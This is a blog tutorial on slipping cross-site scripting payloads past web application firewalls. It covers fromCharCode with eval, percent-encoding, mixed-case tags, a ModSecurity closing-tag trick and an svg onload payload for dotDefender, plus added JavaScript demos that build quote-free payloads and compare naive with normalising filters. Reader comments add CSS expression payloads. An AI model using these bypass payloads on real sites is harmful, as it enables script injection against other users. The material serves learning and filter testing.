
Saturday 5 September 2015

Bypassing Modern XSS WAF Filters

Cross-site scripting (XSS) is a vulnerability that arises when a web application fails to validate user-supplied input and to encode it in the server's response. It lets an attacker inject malicious HTML or JavaScript into the target website, where it runs in the browsers of other users.
In the previous tutorials on XSS we covered the basics of the attack and its use together with SQL injection.

Now let's move on to bypassing XSS WAF filters using different techniques.
In the usual case, exploiting an XSS vulnerability is straightforward because the target site has no web application firewall (WAF) at all.
Behind a strong WAF, however, the plain payloads are blocked, and the attacker has to find a way past the filter.

Bypassing Modern XSS WAF Filters:
Let's start with the basic XSS payload that we use most often.
Here is the XSS payload:

<script>alert("XSS")</script>

If the target site has no WAF or only a weak one, this payload exploits the XSS directly; against a modern WAF filter we first have to get around the filter. Some filters escape or strip characters from the payload, such as the single quote ('), the double quote (") or the backslash (\). PHP's old magic_quotes_gpc setting, for example, prefixes every quote and backslash in the request with a backslash. Here are some methods for working around the loss of those characters.

Bypassing XSS WAF by using ASCII Values:
In this method we avoid the blocked characters by spelling out the string as ASCII character codes.
Let's say this is our XSS payload:

<script>alert("XSS")</script>

When we submit this payload, the filter (or PHP's magic quotes) escapes the single and double quotes and the payload no longer works. To get around that we express the quoted part of the payload as ASCII character codes and let JavaScript rebuild it at run time. Hackbar's String.fromCharCode() helper converts a string to this form. The converted value is a JavaScript expression: when the browser evaluates it, String.fromCharCode() turns the numbers back into the characters we encoded.

For example:
XSS payload: alert("XSS")

ASCII converted value:
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)

Note that String.fromCharCode() only returns a string; it does not execute it. On its own inside a script tag the expression builds the string alert("XSS") and then discards it, so nothing happens. It has to be passed to something that runs the string, such as eval(). Our XSS payload with the converted string therefore becomes:
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41))</script>

This payload contains none of the quote characters the filter strips, so it passes the filter and the script runs in the target site.
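To make the String.fromCharCode() point concrete, here is an added example (not code from the original post) that generates the expression from a string, runs it the way a script element would with a stand-in alert() recording its argument, and checks that the resulting payload contains no quote or backslash characters. It also shows a shorter variant that keeps alert() in clear and encodes only the argument, so no eval() is needed. The stand-in alert() and the FILTERED character set are assumptions for the demonstration.

```javascript
// Added example (not part of the original post): building a quote-free
// payload with String.fromCharCode() and checking what the browser-side
// evaluation actually does with it.

// Turn a string into a String.fromCharCode(...) expression. Each character
// becomes its UTF-16 code unit, so the output is digits, commas, spaces and
// parentheses only: no quotes or backslashes for a magic-quotes style
// filter to escape.
function toCharCodeExpr(s) {
  const codes = [];
  for (let i = 0; i < s.length; i++) codes.push(s.charCodeAt(i));
  return `String.fromCharCode(${codes.join(', ')})`;
}

// Wrap JavaScript in the script tags of the final payload.
function scriptTag(js) {
  return `<script>${js}</script>`;
}

// The characters the filter described in the text escapes: ' " \
// (assumed set for this demonstration)
const FILTERED = /['"\\]/;

// Run script-element JavaScript with a stand-in alert() that records its
// argument, so we can see whether alert fires and with what value.
function runScript(js) {
  const calls = [];
  const fakeAlert = (x) => { calls.push(String(x)); };
  Function('alert', js)(fakeAlert);   // direct eval() inside sees this alert
  return calls;
}

// Variant 1 (the post's approach): encode the whole call. Run bare, the
// expression merely builds the string 'alert("XSS")' and throws it away;
// eval() is what executes it.
const wholeCall = toCharCodeExpr('alert("XSS")');
const bareJs = wholeCall;                  // does nothing when run
const evalJs = `eval(${wholeCall})`;       // pops the alert

// Variant 2: keep alert() in clear and encode only the argument. No eval()
// and still no quotes anywhere in the payload.
const argJs = `alert(${toCharCodeExpr('XSS')})`;

// Collect what each form does and whether the filter would touch it.
function demo() {
  return {
    expr: wholeCall,
    bareFires: runScript(bareJs),          // [] : nothing happened
    evalFires: runScript(evalJs),          // ['XSS']
    argFires: runScript(argJs),            // ['XSS']
    evalPayload: scriptTag(evalJs),
    argPayload: scriptTag(argJs),
    evalPayloadFiltered: FILTERED.test(scriptTag(evalJs)),  // false
    argPayloadFiltered: FILTERED.test(scriptTag(argJs)),    // false
  };
}

console.log(demo());
```

The bare expression produces no call at all, which is the bug in the un-wrapped payload; both the eval() form and the argument-only form reach alert() with the decoded string while keeping every quote out of the request.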

Bypassing XSS WAF by using Hex Encoding:
In this method we percent-encode the whole XSS payload, writing each byte as % followed by its hex value, and send that to the target site. This gets the payload past a filter that inspects the raw request and looks for the literal tag.

Here is our XSS payload:

<script>alert("XSS")</script>

Encoded value: %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e

So we use this encoded value in the target site. Two caveats: the trick only helps when the application URL-decodes the parameter before reflecting it (otherwise the browser sees the literal text %3c, not a tag), and a WAF that decodes the request before matching sees the decoded payload anyway. Double encoding (encoding the % sign itself as %25) is the usual next step when the WAF decodes once and the application decodes a second time.

Bypassing XSS WAF by Obfuscating:
In this method we mix upper and lower case letters in the keywords of our XSS payload. In some cases the admin has blocked plain words like "alert" or "script", and when we submit the payload the WAF filter strips or rejects them and the payload does not work.
So in that case we mix upper and lower case letters instead of writing the plain words.

Here is our XSS payload: <script>alert("XSS")</script>

Bypassed XSS payload: <ScRiPt>alert("XSS")</ScRiPt>

This works because HTML tag and attribute names are case-insensitive, so the browser treats <ScRiPt> exactly like <script>. JavaScript identifiers are case-sensitive, however: aLeRT is not alert and would only throw a ReferenceError, so the mixed case has to stay in the HTML part of the payload and not in the script. The technique also only beats a filter that matches case-sensitively; most rule sets match case-insensitively.
These are some basic XSS WAF bypass techniques that help in an XSS attack.
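To show what the percent-encoding and case-mixing techniques above do and do not achieve, here is an added example (not code from the original post) that builds the encoded, double-encoded and mixed-case forms of the payload and runs each through two filters written for this demonstration: a naive one that looks for the literal string "<script" in the raw parameter, and a normalising one that URL-decodes repeatedly and lowercases before matching, which is how a real WAF engine typically prepares the input. Both filters, the bounded decode loop and the payload variants are assumptions for the example.

```javascript
// Added example (not part of the original post): how percent-encoding and
// mixed case defeat a naive signature filter, and why a filter that
// normalises the request first is not fooled by either.

const PAYLOAD = '<script>alert("XSS")</script>';

// Percent-encode every byte, the way the post's "hex" value is built
// (%3c%73... for "<s..."). encodeURIComponent() would leave letters alone;
// here everything is encoded, matching the post's output.
function percentEncodeAll(s) {
  return Array.from(Buffer.from(s, 'utf8'),
    (b) => '%' + b.toString(16).padStart(2, '0')).join('');
}

// Alternate upper and lower case in a tag name. HTML tag names are
// case-insensitive, so <ScRiPt> is still a script element. Applied to the
// HTML only, never to JavaScript identifiers, which are case-sensitive.
function mixCase(tagName) {
  return Array.from(tagName,
    (c, i) => (i % 2 ? c.toLowerCase() : c.toUpperCase())).join('');
}

function caseMixedPayload(p) {
  return p.replace(/<(\/?)script>/g, (m, slash) => `<${slash}${mixCase('script')}>`);
}

// A deliberately naive filter (assumed for the demo): case-sensitive literal
// match on the raw request parameter. This is the kind of rule the tricks
// in the post beat.
function naiveBlocked(raw) {
  return raw.includes('<script');
}

// A normalising filter (assumed for the demo): URL-decode until the value
// stops changing, which undoes single and double encoding, then lowercase
// and match. The loop is bounded so a hostile input cannot spin it forever.
function normalise(raw) {
  let cur = raw;
  for (let i = 0; i < 5; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }  // malformed %xx
    if (next === cur) break;
    cur = next;
  }
  return cur.toLowerCase();
}

function normalisedBlocked(raw) {
  return normalise(raw).includes('<script');
}

// Run the plain payload and the three disguised forms through both filters.
function compare() {
  const variants = {
    plain: PAYLOAD,
    encoded: percentEncodeAll(PAYLOAD),
    doubleEncoded: percentEncodeAll(percentEncodeAll(PAYLOAD)),
    mixedCase: caseMixedPayload(PAYLOAD),
  };
  const out = {};
  for (const [name, raw] of Object.entries(variants)) {
    out[name] = { raw, naive: naiveBlocked(raw), normalised: normalisedBlocked(raw) };
  }
  return out;
}

console.log(compare());
```

Every disguised variant slips past the naive filter and every one is caught by the normalising filter, which is why these encodings only help against a WAF that matches the raw request without decoding or case-folding it first. The normalise() routine is also what the application itself effectively does before reflecting the value, so the decoded form is what the browser ends up parsing.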

Bypassing XSS WAF Mod_Security:
Sometimes when we submit our XSS payload we get an error like:
"Not Acceptable! An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security"

This is ModSecurity's default 406 response, so we have to get past the ModSecurity rules on the target site.

Our XSS payload:
<script>alert("XSS")</script>

Here is the bypass for our XSS payload:
<script>alert("XSS")</scri0pt>

The idea is that the rule matches on the closing </script> tag, so the closing tag is mangled while the opening tag is kept. Be aware that </scri0pt> is not a valid end tag for the script element: the browser keeps reading script content until it finds the next real </script> on the page, so whether the injected code runs depends on what follows the injection point. Check the actual response before relying on it.

Bypassing XSS WAF dotDefender:
dotDefender is another web application firewall (WAF) that stops our malicious code from reaching the target site. When we try to run our XSS query against a dotDefender-protected website it gives an error:

"dotDefender Blocked Your Request"

In that case our script won't work there, and we need to bypass dotDefender to run our script in the web application. Here is the XSS payload that gets past dotDefender:

dotDefender WAF bypassed XSS payload: <svg/onload=prompt(1);>

This avoids the script tag and the alert keyword entirely: the slash between the tag name and the attribute is a valid separator in HTML, and the onload handler of an inline svg element fires as soon as the element is parsed.
AUTHOR: Rai Muzammal Hussain

24 comments:

  1. All About #XSS :D (Y) Advanced Method (New)
    http://www.ideamindmu.com/2016/02/advanced-cross-site-scripting-xss-cheat.html

  2. body{xss:expression(alert("Xss-By-Muhaddi"))}

  3. xss:expression(alert(/Xss-By-Muhaddi/))